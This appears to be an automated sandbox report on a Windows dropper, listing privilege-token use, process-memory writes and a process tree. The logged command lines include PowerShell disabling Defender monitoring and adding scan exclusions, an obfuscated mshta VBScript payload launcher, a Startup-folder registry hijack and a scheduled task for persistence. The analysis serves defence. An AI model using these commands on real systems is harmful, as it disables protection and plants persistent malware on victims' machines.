N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\RunDll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe
PID 540 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 3756 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe
PID 3756 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13459b4085.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exe

Mon135d1cd0566c227c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe

Mon13459b4085.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe

Mon13d453d994180b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe

Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe

Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe

Mon13a2838ed1d8384.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exe

Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp" /SL5="$7007A,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe"

C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp" /SL5="$401E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe

Mon13248c3d7ea8c81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe

Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe

Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe

Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp" /SL5="$401D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe

"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"

C:\Users\Admin\AppData\Local\Temp\chrome update.exe

"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe

"C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F

C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe

3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9

C:\Users\Admin\AppData\Local\Temp\chrome1.exe

"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 780

C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe

"C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 808

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe

"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -im "Mon133b4073df5e3f72.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )

C:\Users\Admin\AppData\Roaming\3490427.exe

"C:\Users\Admin\AppData\Roaming\3490427.exe"

C:\Users\Admin\AppData\Roaming\4775316.exe

"C:\Users\Admin\AppData\Roaming\4775316.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 840

C:\Users\Admin\AppData\Roaming\6971572.exe

"C:\Users\Admin\AppData\Roaming\6971572.exe"

C:\Users\Admin\AppData\Roaming\1961519.exe

"C:\Users\Admin\AppData\Roaming\1961519.exe"

C:\Users\Admin\AppData\Roaming\8883359.exe

"C:\Users\Admin\AppData\Roaming\8883359.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 864

C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe

"C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe"

C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe

"C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 880

C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe

"C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\3EEB.bat "C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe""

C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe

"C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe"

C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe

"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 964

